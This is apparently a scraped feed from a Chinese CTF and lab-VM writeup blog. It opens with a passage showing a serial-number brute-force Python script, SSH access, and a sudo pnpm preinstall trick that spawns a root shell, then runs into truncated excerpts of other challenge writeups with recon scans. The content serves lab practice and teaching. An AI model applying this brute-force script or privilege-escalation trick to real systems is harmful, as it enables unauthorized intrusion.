'6K+35LiN6KaB5bCd6K+V5pq05Yqb56C06Kej77yM5LuU57uG55yL55yL5Yqg5a+G5rqQ5Luj56CB44CC'; let a = []; let b = []; let e = []; let f = []; let z = []; // 处理SN字符串 for (let i = 0; i < SN.length; i++) { const charCode = SN.charCodeAt(i); if (i >= 0 && i <= 4) { a.push(R(charCode)); b.push(R(charCode)); e.push(R(charCode)); f.push(R(charCode)); z.push(R(charCode)); } if (i >= 5 && i <= 9) { b.push(R(charCode)); e.push(R(charCode)); f.push(R(charCode)); z.push(R(charCode)); } if (i >= 10 && i <= 14) { e.push(R(charCode)); f.push(R(charCode)); z.push(R(charCode)); } if (i >= 15 && i <= 19) { f.push(R(charCode)); z.push(R(charCode)); } if (i >= 20 && i <= 24) { z.push(R(charCode)); } } // console.log('a', a); // console.log('b', b); // console.log('e', e); // console.log('f', f); // console.log('z', z); // e = Math.max(f, g); if (a[0] > a[2] || a[1] > a[3]) { a[0] = Math.max(a[0], a[1], a[2], a[3], a[4]); } else { a[0] = Math.min(a[0], a[1], a[2], a[3], a[4]); } if (b[4] > b[6]) { b[0] = Math.max(b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7]); } else { b[0] = Math.min(b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7]); } if (e[8] > e[10] || e[9] > e[11]) { e[0] = Math.max(e[0], e[1], e[2], e[3], e[4], e[5], e[6], e[7], e[8], e[9], e[10], e[11]); } else { e[0] = Math.min(e[0], e[1], e[2], e[3], e[4], e[5], e[6], e[7], e[8], e[9], e[10], e[11]); } if (f[0] > f[10]) { f[0] = Math.max(f[0], f[1], f[2], f[3], f[4], f[5], f[6], f[7], f[8], f[9], f[10], f[11], f[12], f[13], f[14], f[15], f[16], f[17], f[18], f[19]); } else { f[0] = Math.min(f[0], f[1], f[2], f[3], f[4], f[5], f[6], f[7], f[8], f[9], f[10], f[11], f[12], f[13], f[14], f[15], f[16], f[17], f[18], f[19]); } if (z[15] > z[17] || z[18] > z[24]) { z[0] = Math.max(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10], z[11], z[12], z[13], z[14], z[15], z[16], z[17], z[18], z[19], z[20], z[21], z[22], z[23], z[24]); } else { z[0] = Math.min(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10], z[11], z[12], z[13], z[14], z[15], z[16], z[17], z[18], z[19], z[20], z[21], z[22], z[23], z[24]); } // console.log('a[0]', a[0]); // console.log('b[0]', b[0]); // console.log('e[0]', e[0]); // console.log('f[0]', f[0]); // console.log('z[0]', z[0]); let sum = 0; for (let i = 0; i < a.length; i++) { sum += a[i] } // console.log('sum', sum); a[0] = (sum ^ a[0]) % 12; a[0] = KEY.charAt(a[0]); for (let i = 0; i < b.length; i++) { sum += b[i] } // console.log('sum', sum); b[0] = (sum ^ b[0]) % 9; b[0] = KEY.charAt(b[0]); for (let i = 0; i < e.length; i++) { sum += e[i] } // console.log('sum', sum); e[0] = (sum ^ e[0]) % 8; e[0] = KEY.charAt(e[0]); for (let i = 0; i < f.length; i++) { sum += f[i] } // console.log('sum', sum); f[0] = (sum ^ f[0]) % 7; f[0] = KEY.charAt(f[0]); for (let i = 0; i < z.length; i++) { sum += z[i] } // console.log('sum', sum); z[0] = (sum ^ z[0]) % 6; z[0] = VI.charAt(z[0]); // console.log('a[0]', a[0]); // console.log('b[0]', b[0]); // console.log('e[0]', e[0]); // console.log('f[0]', f[0]); // console.log('z[0]', z[0]); let hashSN = md5(a[0] + b[0] + e[0] + f[0] + z[0]); // console.log('hashSN', hashSN); return hashSN; } ``` 他这hashSN有问题，是固定的量，爆破一下就好了 去网页抓个包  随便输点，抓包 ``` POST /checkSN HTTP/1.1 Host: 192.168.205.131:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Referer: http://192.168.205.131:8080/ Content-Type: application/json Content-Length: 41 Origin: http://192.168.205.131:8080 Connection: keep-alive Priority: u=4 {'sn':'4818799e57fe67c963b90a99f797beae'} ``` 然后丢给AI吧，不想自己写 然后AI给的有点小问题，不显示每次爆破就算了，好像它爆破成功了也会继续爆破，自己改一下吧 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ vim bp.py ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ cat bp.py import hashlib import json import queue import threading import requests KEY = '6K+35LiN6KaB5bCd6K+V5pq05Yqb56C06Kej77yM5LuU57uG55yL55yL5Yqg5a+G5rqQ5Luj56CB44CC' VI = 'Jkdsfojweflk0024564555*' def generate_all_hashes(): hashes = [] for i1 in range(12): s1 = KEY[i1] for i2 in range(9): s2 = KEY[i2] for i3 in range(8): s3 = KEY[i3] for i4 in range(7): s4 = KEY[i4] for i5 in range(6): s5 = VI[i5] s = s1 + s2 + s3 + s4 + s5 md5_hex = hashlib.md5(s.encode()).hexdigest() hashes.append(md5_hex) return hashes def worker(q, result, url): headers = {'Content-Type': 'application/json'} while not result and not q.empty(): try: hash_sn = q.get_nowait() data = json.dumps({'sn': hash_sn}) response = requests.post(url, headers=headers, data=data, timeout=5) if response.status_code == 200: try: resp_data = response.json() if resp_data.get('code') == 200: result.append(hash_sn) print(f'[+] Success! Found Valid SN: {hash_sn}') return else: print(f'[-] Failed: {hash_sn} -> {resp_data.get('msg', 'Unknown error')}') except json.JSONDecodeError: print(f'[-] Failed (Invalid JSON): {hash_sn}') else: print(f'[-] Failed (HTTP {response.status_code}): {hash_sn}') except Exception as e: print(f'[!] Error with {hash_sn}: {str(e)}') finally: q.task_done() if __name__ == '__main__': SERVER_URL = 'http://192.168.205.131:8080/checkSN' all_hashes = generate_all_hashes() print(f'Generated {len(all_hashes)} hashes. Starting爆破...') task_queue = queue.Queue() for h in all_hashes: task_queue.put(h) valid_hash = [] num_threads = 8 threads = [] for _ in range(num_threads): t = threading.Thread(target=worker, args=(task_queue, valid_hash, SERVER_URL)) t.daemon = True t.start() threads.append(t) task_queue.join() if valid_hash: print(f'[+] Valid hashSN found: {valid_hash[0]}') else: print('[-] No valid hashSN found.') ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ python3 $_ Generated 36288 hashes. Starting爆破... [-] Failed: 7e761b3333f90f1adb4b2bdb0192256f -> Error: Invalid SN 省略 [+] Success! Found Valid SN: ee5a82db0f9bf1c1903821477e11c067 ``` SN: ee5a82db0f9bf1c1903821477e11c067，我们试一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ curl -X POST -H 'Content-Type: application/json' -d '{'sn': 'ee5a82db0f9bf1c1903821477e11c067'}' http://192.168.205.131:8080/checkSN {'code':200,'data':'welcome:DPKU9-8APJ9-8XZJ0-8XZ08-7H111','msg':'Success: Valid SN '} ``` 登录 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ ssh welcome@192.168.205.131 The authenticity of host '192.168.205.131 (192.168.205.131)' can't be established. ED25519 key fingerprint is SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:16: [hashed name] ~/.ssh/known_hosts:17: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.131' (ED25519) to the list of known hosts. welcome@192.168.205.131's password: ============================= Welcome!!! QQ Group:660930334 ============================= lingdong:~$ id uid=1000(welcome) gid=1000(welcome) groups=1000(welcome) ``` 找信息 ``` lingdong:~$ sudo -l Matching Defaults entries for welcome on lingdong: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for welcome: Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL' User welcome may run the following commands on lingdong: (ALL : ALL) NOPASSWD: /root/.local/share/pnpm/global-bin/pm2 (ALL : ALL) NOPASSWD: /usr/bin/pnpm ``` 看有没有现成的 没找到，看看帮助文档 ``` lingdong:~$ sudo /usr/bin/pnpm --help Version 10.11.1 (compiled to binary; bundled Node.js v20.11.1) Usage: pnpm [command] [flags] pnpm [ -h | --help | -v | --version ] Manage your dependencies: add Installs a package and any packages that it depends on. By default, any new package is installed as a prod dependency import Generates a pnpm-lock.yaml from an npm package-lock.json (or npm-shrinkwrap.json) file i, install Install all dependencies for a project it, install-test Runs a pnpm install followed immediately by a pnpm test ln, link Connect the local project to another one prune Removes extraneous packages rb, rebuild Rebuild a package rm, remove Removes packages from node_modules and from the project's package.json unlink Unlinks a package. Like yarn unlink but pnpm re-installs the dependency after removing the external link up, update Updates packages to their latest version based on the specified range Review your dependencies: audit Checks for known security issues with the installed packages licenses Check licenses in consumed packages ls, list Print all the versions of packages that are installed, as well as their dependencies, in a tree-structure outdated Check for outdated packages Run your scripts: exec Executes a shell command in scope of a project run Runs a defined package script start Runs an arbitrary command specified in the package's 'start' property of its 'scripts' object t, test Runs a package's 'test' script, if one was provided Other: cat-file Prints the contents of a file based on the hash value stored in the index file cat-index Prints the index file of a specific package from the store find-hash Experimental! Lists the packages that include the file with the specified hash. pack Create a tarball from a package publish Publishes a package to the registry root Prints the effective modules directory Manage your store: store add Adds new packages to the pnpm store directly. Does not modify any projects or files outside the store store path Prints the path to the active store directory store prune Removes unreferenced (extraneous, orphan) packages from the store store status Checks for modified packages in the store Options: -r, --recursive Run the command for each project in the workspace. ``` 看着有点像npm啊，这玩意和npm差不多吧？试试  ``` lingdong:~$ TF=$(mktemp -d) lingdong:~$ echo '{'scripts': {'preinstall': '/bin/sh'}}' > $TF/package.json lingdong:~$ sudo pnpm -C $TF --unsafe-perm i Already up to date > @ preinstall /tmp/tmp.ggFJFL > /bin/sh /tmp/tmp.ggFJFL # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) ``` 可以，拿一下flag ``` /tmp/tmp.ggFJFL # cat /root/root.txt flag{root-b89ed76b27e91ad5d773ddadae256072} /tmp/tmp.ggFJFL # cat /home/welcome/user.txt flag{user-afc8b494c5ba167971f10274f5a81534} ```。https://7r1UMPH.github.io/post/nei-bu-_bughash.htmlSun, 08 Jun 2025 07:39:18 +0000https://7r1UMPH.github.io/post/nei-bu-_Eva.html 打坤打坤 探测ip ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ sudo arp-scan -l [sudo] password for kali: Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.205.1 00:50:56:c0:00:08 VMware, Inc. 192.168.205.2 00:50:56:f4:ef:6f VMware, Inc. 192.168.205.130 08:00:27:9c:35:56 PCS Systemtechnik GmbH 192.168.205.254 00:50:56:ed:18:9e VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.044 seconds (125.24 hosts/sec). 4 responded ``` 靶机ip 192.168.205.130，探测服务 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nmap -p- 192.168.205.130 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 22:27 EDT Nmap scan report for 192.168.205.130 Host is up (0.00022s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:9C:35:56 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nmap -p22,80 -sC -sV 192.168.205.130 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 22:28 EDT Nmap scan report for 192.168.205.130 Host is up (0.00034s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-server-header: Apache/2.4.62 (Debian) |_http-title: \xE2\x9D\x80 \xE9\xBE\x8D \xC2\xB7 \xE8\xA6\xBA\xE9\x86\x92 \xE2\x9D\x80 MAC Address: 08:00:27:9C:35:56 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds ``` 常规，看web  一个关于《龙族》的页面 扒拉了一下源代码，没有什么 目录爆破 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ dirsearch -u http://192.168.205.130/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /mnt/hgfs/gx/reports/http_192.168.205.130/__25-06-07_22-30-53.txt Target: http://192.168.205.130/ [22:30:53] Starting: [22:30:54] 403 - 280B - /.ht_wsr.txt [22:30:54] 403 - 280B - /.htaccess.bak1 [22:30:54] 403 - 280B - /.htaccess.orig [22:30:54] 403 - 280B - /.htaccess.sample [22:30:54] 403 - 280B - /.htaccess.save [22:30:54] 403 - 280B - /.htaccess_extra [22:30:54] 403 - 280B - /.htaccess_sc [22:30:54] 403 - 280B - /.htaccess_orig [22:30:54] 403 - 280B - /.htaccessBAK [22:30:54] 403 - 280B - /.htaccessOLD [22:30:54] 403 - 280B - /.htaccessOLD2 [22:30:54] 403 - 280B - /.htm [22:30:54] 403 - 280B - /.html [22:30:54] 403 - 280B - /.htpasswd_test [22:30:54] 403 - 280B - /.htpasswds [22:30:54] 403 - 280B - /.httr-oauth [22:30:54] 403 - 280B - /.php [22:31:14] 403 - 280B - /server-status [22:31:14] 403 - 280B - /server-status/ Task Completed ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ gobuster dir -u http://192.168.205.130/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip -t 64 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.205.130/ [+] Method: GET [+] Threads: 64 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,html,zip [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 280] /.html (Status: 403) [Size: 280] /index.html (Status: 200) [Size: 12224] /dragon.php (Status: 200) [Size: 10284] Progress: 76819 / 1102800 (6.97%) ``` 探测到一个/dragon.php，先看看  有四个言灵，扒拉一下源代码 源代码重点 ``` <div class='incantation-name' data-name='divinedecree'> DivineDecree <div class='tooltip'> <div class='tooltip-title'>DIVINE DECREE</div> <div class='tooltip-desc'> The holy light that illuminates all truth. This ability allows access to all knowledge and secrets.<br><br> ⚠️ WARNING: DivineDecree can reveal and read ALL content without restrictions. Handle with extreme care! </div> </div> </div> ``` '⚠️ 警告：DivineDecree 可以不受限制地显示和阅读所有内容。https://7r1UMPH.github.io/post/nei-bu-_Eva.htmlSun, 08 Jun 2025 07:26:38 +0000https://7r1UMPH.github.io/post/Challenge%2020250526.html## 第一部分：分析 `ezflag` 文件 ### 1. 初步文件检查 下载挑战附件，得到名为 `ezflag` 的文件。https://7r1UMPH.github.io/post/Challenge%2020250526.htmlMon, 26 May 2025 09:00:57 +0000https://7r1UMPH.github.io/post/nei-bu-_Qingmei.html## 1. 信息收集 ### 1.1 主机发现 使用 `arp-scan` 工具对本地网络 `192.168.205.0/24` 进行扫描，以识别目标主机。https://7r1UMPH.github.io/post/nei-bu-_Qingmei.htmlMon, 19 May 2025 04:04:57 +0000https://7r1UMPH.github.io/post/vulnyx_Denied.html# 1. 信息收集 - 目标锁定！  这靶机纯复现，因为我都知道它口在哪了。https://7r1UMPH.github.io/post/vulnyx_Denied.htmlMon, 19 May 2025 04:04:25 +0000https://7r1UMPH.github.io/post/eeeeeasy%20-ba-ji-shen-tou-ce-shi-Writeup.html靶机名字: eeeeeasy（群友机器，可能后面会发布在hackmyvm） 哈，看这名字，是想说 '太简单啦' 还是 'eeee...easy?' 不管了，开干！ ### 1. 信息收集 - 找到你了！ 老规矩，先用 `arp-scan` 在内网里扫一圈，看看目标在哪儿。https://7r1UMPH.github.io/post/eeeeeasy%20-ba-ji-shen-tou-ce-shi-Writeup.htmlSun, 18 May 2025 06:30:37 +0000https://7r1UMPH.github.io/post/Challenge%20015.html**挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=015  ## 1. 初步分析 挑战页面显示了一段被 `<pre>` 标签包裹的文本： ```html <pre> push 7d616579 push 74696874 push 726f7773 push 696d7361 push 7b766d68 </pre> ``` 该文本包含一系列 `push` 指令，后跟十六进制数值。https://7r1UMPH.github.io/post/Challenge%20015.htmlSun, 18 May 2025 06:30:01 +0000https://7r1UMPH.github.io/post/Challenge%20014.html# 1. 初步分析 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=014  ## 1. 初步分析 挑战页面非常直接地给出了任务： ``` Find the flag in the domain http://momo.hackmyvm.eu ``` 这表明 Flag 隐藏在目标域名 `http://momo.hackmyvm.eu` 的某个位置。https://7r1UMPH.github.io/post/Challenge%20014.htmlSun, 18 May 2025 06:29:30 +0000https://7r1UMPH.github.io/post/Challenge%20013.html**挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=013  ## 1. 初步分析 访问挑战页面，页面上显示了一段被 `<pre>` 标签包裹的文本： ```html <pre> MXV{BNRNKWPCEUSEX} k:FLAG </pre> ``` 这段文本包含两部分： 1. `MXV{BNRNKWPCEUSEX}`: 这看起来是一个加密后的 Flag 格式，其中 `MXV` 可能是加密文本的前缀，`BNRNKWPCEUSEX` 是密文。https://7r1UMPH.github.io/post/Challenge%20013.htmlSun, 18 May 2025 06:28:56 +0000https://7r1UMPH.github.io/post/Challenge%20012.html# Challenge 012 # Challenge 012 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=012  ## 1. 初步分析 下载文件 ```bash ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 012.zip 012.mp3 -rwxr-xr-x 1 kali kali 17286 Mar 6 2022 012.mp3 -rwxr-xr-x 1 kali kali 16978 May 17 23:06 012.zip ``` 首先尝试直接解压 `012.zip` 文件，解压出`012.mp3` ### 2 音频内容分析 通过播放 `012.mp3` 文件并仔细听取其内容。https://7r1UMPH.github.io/post/Challenge%20012.htmlSun, 18 May 2025 03:36:33 +0000https://7r1UMPH.github.io/post/Challenge%20011.html# 1. 初步分析 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=011  ## 1. 初步分析 挑战页面显示了一段被 `<pre>` 标签包裹的文本，这通常意味着其中的空格和换行符会被保留，以维持其原始格式。https://7r1UMPH.github.io/post/Challenge%20011.htmlSun, 18 May 2025 03:36:02 +0000https://7r1UMPH.github.io/post/Challenge%20010.html# 1. 初步分析 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=010  ## 1. 初步分析 挑战页面直接显示了一串看起来经过编码的字符串： ``` 853-3GB.eOG[ko/A7oS$FF= ``` 这串字符包含了大小写字母、数字以及一些特殊符号 (`-`, `.`, `[`, `]`, `/`, `$`, `=`)。https://7r1UMPH.github.io/post/Challenge%20010.htmlSun, 18 May 2025 03:35:31 +0000https://7r1UMPH.github.io/post/Challenge%20009.html# 1. 初步分析 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=009  ## 1. 初步分析 访问该链接后，页面显一行文字： ```html The flag is here. <!-- HMV{infrontofme} --> ``` ## 2. Flag 最终的 Flag 是： ``` HMV{infrontofme} ``` 。https://7r1UMPH.github.io/post/Challenge%20009.htmlSun, 18 May 2025 03:35:00 +0000https://7r1UMPH.github.io/post/Challenge%20008.html# Challenge 008 # Challenge 008 **挑战链接:** https://hackmyvm.eu/challenges/challenge.php?c=008  ## 1. 初步分析 挑战提供了一个可下载文件：`008.zip`。https://7r1UMPH.github.io/post/Challenge%20008.htmlSun, 18 May 2025 03:34:29 +0000https://7r1UMPH.github.io/post/Challenge%20007%EF%BC%9A-fan-zhuan-zi-fu-yu-Base64-jie-ma-fen-xi.html# 初始观察 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=007](https://hackmyvm.eu/challenges/challenge.php?c=007) ## 初始观察 访问挑战页面后，展示了以下经过特殊处理的字符串：  原始字符串为： ``` =0Xd0ʞƐMOqWMςЯzɘWƖƎƧ ``` 该字符串包含反转字符和 Unicode 特殊字符，初步判断需要进行文本反转和字符替换操作。https://7r1UMPH.github.io/post/Challenge%20007%EF%BC%9A-fan-zhuan-zi-fu-yu-Base64-jie-ma-fen-xi.htmlSun, 18 May 2025 03:33:58 +0000https://7r1UMPH.github.io/post/Challenge%20006%EF%BC%9ATXT-ji-lu-de-mi-mi.html# 挑战信息 ### 挑战信息 * **挑战名称/编号:** Challenge 006 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=006](https://hackmyvm.eu/challenges/challenge.php?c=006) ### 初始观察  我们得到了像 `'hackmyvm.eu. 100 IN TXT'` 这样的提示，那目标就非常明确了——直奔 `hackmyvm.eu` 的 TXT 记录去！ ## 探索过程 有了这么明确的指向，咱们就用 `dig` 命令来一探究竟。https://7r1UMPH.github.io/post/Challenge%20006%EF%BC%9ATXT-ji-lu-de-mi-mi.htmlSun, 18 May 2025 03:33:27 +0000https://7r1UMPH.github.io/post/hmv_Disguise-ba-ji-shen-tou-ce-shi-xiang-jie.html# 一、信息收集与初步探测 ## 1.1 主机发现 渗透测试的第一步通常是发现网络中的存活主机。https://7r1UMPH.github.io/post/hmv_Disguise-ba-ji-shen-tou-ce-shi-xiang-jie.htmlFri, 16 May 2025 12:21:22 +0000https://7r1UMPH.github.io/post/VulnHub%20Death%20Star-%201%20-shen-tou-ce-shi-bao-gao.html靶机地址: [https://www.vulnhub.com/entry/death-star-1,477/](https://www.vulnhub.com/entry/death-star-1,477/)  ### 1. 主机发现与端口扫描 首先，使用 `arp-scan` 发现靶机 IP 地址。https://7r1UMPH.github.io/post/VulnHub%20Death%20Star-%201%20-shen-tou-ce-shi-bao-gao.htmlThu, 15 May 2025 13:14:04 +0000https://7r1UMPH.github.io/post/ba-ji-%20X1%20-shen-tou-ce-shi-bao-gao.htmlHello！今天分享一下靶机 X1 的渗透过程。https://7r1UMPH.github.io/post/ba-ji-%20X1%20-shen-tou-ce-shi-bao-gao.htmlThu, 15 May 2025 11:31:16 +0000https://7r1UMPH.github.io/post/HackMyVM%20-you-hou-fu-zhu-jiao-ben.html## 1. 起因 🤔 最近逛我博客的新朋友好像多了起来，不少人被安利去玩 **HackMyVM** 了。https://7r1UMPH.github.io/post/HackMyVM%20-you-hou-fu-zhu-jiao-ben.htmlFri, 02 May 2025 07:26:43 +0000https://7r1UMPH.github.io/post/Challenge%20005%20-po-jie-%20Shadow%20-wen-jian.html### 挑战信息 * **挑战名称/编号:** Challenge 005 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=005](https://hackmyvm.eu/challenges/challenge.php?c=005) ### 初始观察  访问挑战页面后，描述告知我们获取了一个目标机器的 `/etc/shadow` 文件，但无法破解其中的 `root` 用户密码。https://7r1UMPH.github.io/post/Challenge%20005%20-po-jie-%20Shadow%20-wen-jian.htmlFri, 02 May 2025 07:25:08 +0000https://7r1UMPH.github.io/post/Challenge%20004%20-shi-liu-jin-zhi-de-mi-mi.html### 挑战信息 * **挑战名称/编号:** Challenge 004 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=004](https://hackmyvm.eu/challenges/challenge.php?c=004) ### 初始观察  访问挑战页面后，页面直接展示了一长串由数字和字母组成的字符串： ``` 686d767b6d79666c61676973656173797d ``` 任务目标是解码或转换这个字符串以获得 Flag。https://7r1UMPH.github.io/post/Challenge%20004%20-shi-liu-jin-zhi-de-mi-mi.htmlFri, 02 May 2025 07:25:06 +0000https://7r1UMPH.github.io/post/Challenge%20003%20-tu-zhong-shi-shui-%EF%BC%9F.html### 挑战信息 * **挑战名称/编号:** Challenge 003 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=003](https://hackmyvm.eu/challenges/challenge.php?c=003) ### 初始观察  访问挑战页面后，页面显示一个问题 'Who is she?'（她是谁？），并附带了一张人物照片。https://7r1UMPH.github.io/post/Challenge%20003%20-tu-zhong-shi-shui-%EF%BC%9F.htmlFri, 02 May 2025 07:25:04 +0000https://7r1UMPH.github.io/post/Challenge%20002%20-yuan-ma-zhi-mi.html### 挑战信息 * **挑战名称/编号:** Challenge 002 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=002](https://hackmyvm.eu/challenges/challenge.php?c=002) ### 初始观察  访问挑战页面后，页面内容提示我们需要访问另一个特定的 URL 来获取 Flag。https://7r1UMPH.github.io/post/Challenge%20002%20-yuan-ma-zhi-mi.htmlFri, 02 May 2025 07:25:02 +0000https://7r1UMPH.github.io/post/Challenge%20001%20Base64%20-bian-ma-jie-xi.html### 挑战信息 * **挑战名称/编号:** Challenge 001 * **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=001](https://hackmyvm.eu/challenges/challenge.php?c=001) ### 初始观察  访问挑战页面后，我们看到页面上给出了一个字符串： ``` aG12e2Jhc2U2NGRlY29kZXJ9 ``` 任务显然是需要对这个字符串进行解码或解释，以获取 Flag。https://7r1UMPH.github.io/post/Challenge%20001%20Base64%20-bian-ma-jie-xi.htmlFri, 02 May 2025 07:24:56 +0000https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Neuroblue%20%28-ce-shi-ba-ji-%29.html## 渗透测试报告 - Neuroblue ## 1. 简介 **靶机名称**: Neuroblue **难度**: 简单 **攻击者 IP:** `192.168.205.188` (Kali Linux) **目标 IP:** `192.168.205.203` (Neuroblue) ## 2. 信息收集 (Enumeration) ### 2.1. 网络发现 (Network Discovery) 使用 `arp-scan` 在本地网络中探测存活主机。https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Neuroblue%20%28-ce-shi-ba-ji-%29.htmlThu, 01 May 2025 10:56:07 +0000https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Bamuwe%20%28-ce-shi-ba-ji-%29.html## 渗透测试报告 - Bamuwe ## 1. 简介 **靶机名称**: Bamuwe(未发布，内部测试靶机，可能后续发布于 HackMyVm) **难度**: 简单 **攻击者 IP:** `192.168.205.188` (Kali Linux) **目标 IP:** `192.168.205.197` (Bamuwe) ## 2. 信息收集 (Enumeration) ### 2.1. 网络发现 (Network Discovery) 使用 `arp-scan` 在本地网络中探测存活主机。https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Bamuwe%20%28-ce-shi-ba-ji-%29.htmlThu, 01 May 2025 00:25:56 +0000https://7r1UMPH.github.io/post/%E2%9C%A8%20-huan-ran-yi-xin-%EF%BC%9A-wo-de-bo-ke-jie-mian-mei-hua-zhi-lv-%20%E2%9C%A8.html大家好！ 最近如果你经常访问我的博客，可能会发现它悄悄地“变脸”了！没错，在过去的一段时间里，我投入了不少精力对博客的前端界面进行了一次比较全面的美化和升级。https://7r1UMPH.github.io/post/%E2%9C%A8%20-huan-ran-yi-xin-%EF%BC%9A-wo-de-bo-ke-jie-mian-mei-hua-zhi-lv-%20%E2%9C%A8.htmlMon, 28 Apr 2025 01:40:08 +0000https://7r1UMPH.github.io/post/Byxs20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-Up%29.html* **靶机名称:** Byxs20 (内部测试 - 可能发布于 HackMyVm) * **难度:** 简单 (Easy) * **目标:** 获取 user.txt 和 root.txt 文件中的 flag。https://7r1UMPH.github.io/post/Byxs20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-Up%29.htmlMon, 21 Apr 2025 11:10:48 +0000https://7r1UMPH.github.io/post/7r1umph%20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-up%29.html## 1. 目标信息 * **靶机名称:** 7r1umph (未发布，内部测试靶机，可能后续发布于 HackMyVm) * **难度**: easy * **靶机IP:** 192.168.205.187 (通过`arp-scan`发现) * **攻击机IP:** 192.168.205.128 (Kali Linux) ## 2. 信息收集 ### 2.1 主机发现 使用 `arp-scan` 在本地网络中发现存活主机。https://7r1UMPH.github.io/post/7r1umph%20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-up%29.htmlSun, 13 Apr 2025 07:35:48 +0000https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20AkaRed%20%28-ce-shi-ba-ji-%29.html## 1. 简介 **靶机名称**: AkaRed (未发布，内部测试靶机，可能后续发布于 HackMyVm) **难度**: 超级简单 **攻击者 IP:** `192.168.205.128` (Kali Linux) **目标 IP:** `192.168.205.185` (AkaRed) ## 1. 信息收集 